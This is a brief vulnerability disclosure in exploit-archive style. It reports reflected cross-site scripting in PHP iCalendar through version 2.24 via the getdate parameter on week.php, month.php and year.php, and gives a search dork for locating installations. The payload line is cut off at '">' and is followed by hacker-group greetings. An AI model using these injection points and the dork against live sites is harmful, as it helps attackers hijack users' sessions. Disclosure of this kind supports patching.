# PHP iCalendar <= 2.24 - Cross-Site Scripting Vulnerability # Download: # http://phpicalendar.net/ # Bug found by Jose Luis Góngora Fernández / JosS # Contact: sys-project[at]hotmail.com # Spanish Hackers Team / Sys - Project # www.spanish-hackers.com # /server irc.freenode.net /join #fullsecure # d0rk: "Powered by PHP iCalendar" [*] Exploit In (XSS): events/calview/week.php?cal=&getdate=[XSS] month.php?cal=&getdate=[XSS] year.php?cal=&getdate=[XSS] [*] Cross Siting Scripting (Code): "> //---------------------------------------\\ Greetz To: All Hackers Jose Luis Góngora Fernández / JosS!